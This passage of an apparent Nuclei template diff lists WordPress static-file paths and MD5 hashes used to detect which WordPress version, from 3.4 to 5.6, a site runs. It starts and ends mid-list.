matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e850d443575b1d311f75c731c61dde14\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"9c04504d1b70332284c7c83425a7742d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"318c49f14d9f92f62bb45641cb3f9eb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9c72b817e54dfe7080be40b6228ac124\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1b1f9ac48af85e1f98f078c7319a89a0\" == 
md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"590bc741b3d9aeb5bc9f56b1aeaf6d52\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1a1d016d4f1a1639a25c77b3f8c52615\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"183493ffd9bb469e92882434bb95f33c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1b074dccc9c4633fdbae077022442b88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"950f64525286dae50d272b854cdf75d5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ec55b9cd3fe27496afa458f46fefa6d3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"751fe5c25fde6b4d3cbeadd98997c531\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"dfa6a9415541755284ed912ba66a47ba\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"393618e58a1aa37bc09cdef0ec54efb1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"17bcc2c784960eece3c2447f28a66e58\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ea233ee70cb4a4630b7f886d19c2274\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"517ab56b0d531c6967cac1e0907dc5fa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"55315f15e1e817ca3facd5ab6c18a4ee\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1174ee5ac6181aca57cc6917e2b36075\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e30255f4c7fea5413bcbf6181939bfbf\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"14f89cdca922d61b3ff683e5d627a025\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"94b9ad8dc1d37141fc0e27d256c50f86\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c18783da8db701a5cd308b6a3530563b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"99c9ad00cc0ea455e2c55d1870e5bf73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.min.css" + matchers: + - type: dsl + 
name: 4.8 - 4.8.15 + dsl: + - "(\"8ae6ce2f95b8413264c6d072b909c620\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"c248a66d772f94a0476323e4d0515d15\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1d8632e98daf0718d1b0998b432d48cc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e971354e52f09076124ee678685ba35d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6467380d6762f4bc5a86477a14b7dc4b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6ced0e37584c576effbc70c359d93acb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"78f7aa6798d9b73385777e885e281438\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f94aad7c60a799b4bf28b0e6ea0b0134\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"58091ac7639e586774b32895a7072e82\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"0a4145917ffe575d9772f4bf3b77fe89\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6513e6580dd660824811aa7cf3420e54\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7a40853c2c0e6cd539b666e46344b442\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ad658adc879ba1db73141c9fa0b5c67d\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"86643ddd4df5737bd4590b16820edba7\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"2638c252972dda9814c5b7dfc1cc082c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"1dddd9f80d54d907aa929e5961b6f623\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3364a10ed6cf2020afca1aa446e3651a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a54850465f93f8b38c578f3d71fa2f81\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"06fbad1b88d31e111f1017966c27bd69\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8c5c74220ca4d13347c89a0533cd3cff\" == md5(body))" + - type: dsl + name: 5.3.1 
- 5.3.6 + dsl: + - "(\"56845933fa75808c849409235ad4766f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0753b59c6807bc3423580a933cc96b5e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"efa336b5c252dc3db265c403b03a55e6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2098c6561d5f3d6993b4eae437b87ab2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"005467044196b65cc61059a99d78c462\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"2bd099c199b51a2a222d0c87b8a791fa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"9ca2f97b97f33e072814772948ad051a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"07dd5ae0a8c519df86710b774937a1f5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"884c2b6847465f6d6fc5c935b73bb65a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f006e699026ed8e27eaa1e3718cbacb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2c67af9db85d688107d3f55599929ae1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1d0e5ded99e0c19c6deab1602412ad4d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1010da3327f8dcd8528c2bfd3ef0d962\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"09dbbe1689c1c4fc968e66c13bf20ac4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3f812ade9d1e4db4ccad691f78c0ef55\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"5cbdf14d7f60ad0eaecc133f000e299b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d7feb34b845f1fa5530a4c51d27bdab1\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8d95686d540ea30f55dd8e2e722a25a3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2e0df4fceb8e32ab27b0d2c5572409b0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + 
- "(\"0d28e5955c3270df8748ab67de079876\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9773dbbd9d575e3a0e0fc860a0e55d40\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d41557432736706066231f14c90effcf\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"21463e25a8cf85c82d861b2dec55238c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7ce7c610de77f1ad665964c41eb139ba\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"1fa7eb851c90dcc8a36840e23a715e00\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2efb4f2640d7d938eb77a9772def851b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9026be550edce0f7bacc680d1a557ba2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6e1661adcd2e83ce04cf3d92987ee133\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"703a6a20853140742564c197783d7574\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"52a6fde74e83e084947136f3028155ca\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0e7d66c60fbc28b402c9360860a50db8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"22bfd8378a0b60880169467965fd20f8\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8af5643dc6458748de289b840a9916e5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8396a236d1272256386e272432393aa6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"559f9973411a9ffe7bfd93098392f82b\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8d4a4692e68a588b456cf537bac52fb2\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"cb2e1d966b121d6b85775afab729a54a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"67d4038d41230db98678ddac36aa9239\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ecf0ee06d97aef62adea7ba425ae7bee\" 
== md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0595bfc9b92f7a1e6357f6bec592451f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1979a03e73de2bfe8aa90aad9ffd6073\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1f20713b071e4fded3ca44cdc67e50c2\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2a60bc6c16ed60d55fbb0dc830a7937f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"55ae1e5716c2f3ef882b6b8736f04e09\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6a1898eda2575feefd20d8817a81610a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"67c654457315f92d37621b68103aa4e2\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d0dc73dd54483a2fc4a1829b708df6b1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"01f906ac3c792ad50368c3792bc1b913\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"34e87e0a7614057b453abd9373beeada\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4443d19726d6c22f43a67891fc5748e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e9fc2b01496fd5fce09fbd8882e91e25\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2afbaaba8864509a66b1b8ed0e31aab3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ffafa3ca2a96904b59497dcd6e8d6c9a\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ba5daf07137183c4710352df09d941f3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"cdf5f4bb049f63d0c102eefe106595e5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"d392c6caa0721b1787e24bf1250167b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"13d08a48b4ba814727ff90025d96572a\" == md5(body))" + - type: dsl + name: 4.4 - 
4.4.24 + dsl: + - "(\"8a21a7e3cfb4d242c84b45135fc62072\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ea3c70b45147963bb9bc33c09003abd2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"27d9de08d110062db4c26b9fea3b21cc\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"633a6048309a6e23d4dedd9e62e65278\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5651f0c5eb694d2d3aa9c1b3daa748fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0fe38cfa9155e6f0ed9734b05dfd3710\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1744d3c0da9ff689de20f91d783a84c1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"6a01df682595d7c10ce1380a2faeab21\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d919280b466eeb955ee3fe2bf88eac7c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"cfecd2c2ab963773152a1366c81a1865\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"598c9f8efe6f61407ff4b43bd01d3139\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"314978fac5db55469bc5810682ca1827\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1595a6d7573e1ef0436a9fd704f40942\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bbfad9e11ad15bf8bdf05eac0c2c13d1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f17bdc34919d5439aec151bf8b430dd0\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"ad52cf5c1455ee32967bfcbef32f0900\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d5897b7031f90ae5e785dcb7a72f7ad6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b55fe3a2ab991f1f94af8178a78f17b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"19815334f12156cdd1f1e44e1e053b7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-api.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - 
"(\"9c031b4273a40cc1ff0b80be3d4723ca\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.8 + dsl: + - "(\"fd75984f189d0a308e7f0fc70436e4eb\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"3b8c124f3009a102041cb7cc70474ed8\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"4cca1500e61bd40abe7b543fd76a5a06\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"2933e0915238937a85a3a6730a6959da\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"47fa0460e792c6f65c4321c66a02ed42\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"1b243f90dc8ec0cdb34d36d3cb92dcba\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a035f4ac1a1b03b0221e038d9aea637e\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"4a2494492cfb02a215d3a171ee869028\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"66cd16f6c18c7dd52b5b7d2f38afef6e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4c8b30fef77ad9532c3e38f7f578049e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"40bb4259dd66a68462fa6232af6cd0b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"5223a4aba4cb80d393eae23c3ac03847\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"301312307914214b7a5a7bdae880a395\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"bf33fe1e46d08e362ea08a9cff9c428a\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f47ee453000230a6e509e5eb09d21b53\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4ef4d5630b4d01f400c1d2bf614aaae5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"debbb450201d4f8b9d8097eb5d2f4984\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7ac52f23f1a20c60ac3bd890e2a9ef5b\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - 
"(\"8a91eaac386e7d441d9041a3fcce3551\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"bb16ef190fbd8dc23da6275b186e8ee3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"bef30601a17af3a107320f36b63ad35c\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"1bf381b227fd0f82983f7f42bfee09e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6f447f8805670fe9f8af96001a9e2e6e\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"891c337677bb836662e8301d9be94544\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"24f60068c92a427fb866616ab3d50b45\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b678d3cd57cec4d2e58abf0753dd5f8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"75d679e763f75d392154374ed55b4745\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"e0a81847317281768696a4235ae81a9b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7e9ec40c4bbfad6d8639bae47dc20971\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"23dad8691685cbf1e30c00812a03c20b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c7e4b9ae15ba4cf51bcf2915d00c1bca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"e49bd1a6378d486ab9dfd8ee73e5c185\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8fa1e9aeea65384be3e4519e5e89e99c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7667c530a7dec4836115d4114aedf41e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a9a8570f751efd8b473156a5e4f99812\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"c05ede63e9bfee178e4307ae1b6d6075\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d3f34daa69b2ac3bf8a346f574a588d6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"765597c3d810bb018d92c6c402830ee1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d957340764df5851005f336311a87847\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"1cd9fb2cd523d2d87e16057d2c86bf72\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4125aeb22a82ba5c411416c3f074b956\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"711f173f6b717396bfdd8900a48eb82e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"48943d583062427bd919c60005f397b3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"498c8501c2c4b1d56968fb2340da8d6e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8f30cb2e9f32a20cf62ff9d398ffd370\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"9a91ffe53383c017e8ee528fe876be37\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"557f9554d0253d59faffc62ddf5d443a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f33467abe97afabe4e76914e9904cd3e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"261b286370e6ebf2fea391d7b5992b82\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"963b64cb0a578fa061771df545c01d24\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"17ec8f8aeb2e2def5d1ebb954866c8b1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d6b3349458d04440394db83f8b5619c2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ceee3748d9e98acadbe2d5dd9157616\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"cfd4cd3bcc251178896d6309b3bf16e3\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9bec0aed392a71368af11b9d7c9924d9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"973d49151bf1c6114103b255fe9bf541\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3b2d84d9a95082cccac3fa29cdd456ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.css" + matchers: + - type: dsl + name: 5.4 + dsl: + - "(\"17083b7c4730dff09fa65894ee2614ff\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"58e2636e4747d7e549bd747542807dc4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"54c87680ee00548dda2ac73d8bdfc089\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"ba2c227c69ec307dc4314b1a47e30e7b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.css" + matchers: + - type: dsl + name: 5.4 + dsl: + - "(\"7a6efade7acf587267923b9f9c7e9642\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8bd1e8ce2c01b7819514b62b6d181c0f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a9bd170afe04ea21dc5660bb612cf41e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"aef5b98fce25d6cb0618916949709a3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"85c2128be6063d7c56e7a6db37e5fe3a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"31bb9d767dc660883cbe4f139d4a1594\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e51791f375ab1b37bc6a6b909117751b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d714e213588655321600965226ddc90d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7ba8bad309cb85ad9bf541efd9125d50\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c997f050f7bb25caf1818ea0f28ed4a4\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e59229c4367889a9e11bf73a24322a21\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"678153b11dc1519f52d1d8272b3a3dda\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"60ec435acce0172de2eb1e32604be34d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ecf181b81b6a1013ac735cc5e7e93214\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"356a27e870aa3c5e65150b03612edecc\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"8ebfa134dd4947ee27a27dc92096f8dc\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fab4fc4dd4ac53e5cf57a9a34553b3f6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"31a66201ba16acb7f87720cbb4f2ee90\" == 
md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e1f6d60bbad12bbb2b3e4237dc429445\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"5a548eab236ffc874cb30cf285096c3d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dbd90a61312819a8356cfb4fe41017eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"416650f0eda7575e5b0c47c9002a88aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"62c7ce65509dfa3104449d4ddc09fa63\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"de0809f2c9675d09fe4f48b617a7e6a1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b13c8ab17b4b40a41ed606a6260c8a45\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"961e427859db7e72579d43e9180f75ac\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c05627fb8b23d03a493634aea897fbb3\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed3c2887d54cf6fb64f55b03413502d0\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3b139483643b8769ec041e86142f0b0c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 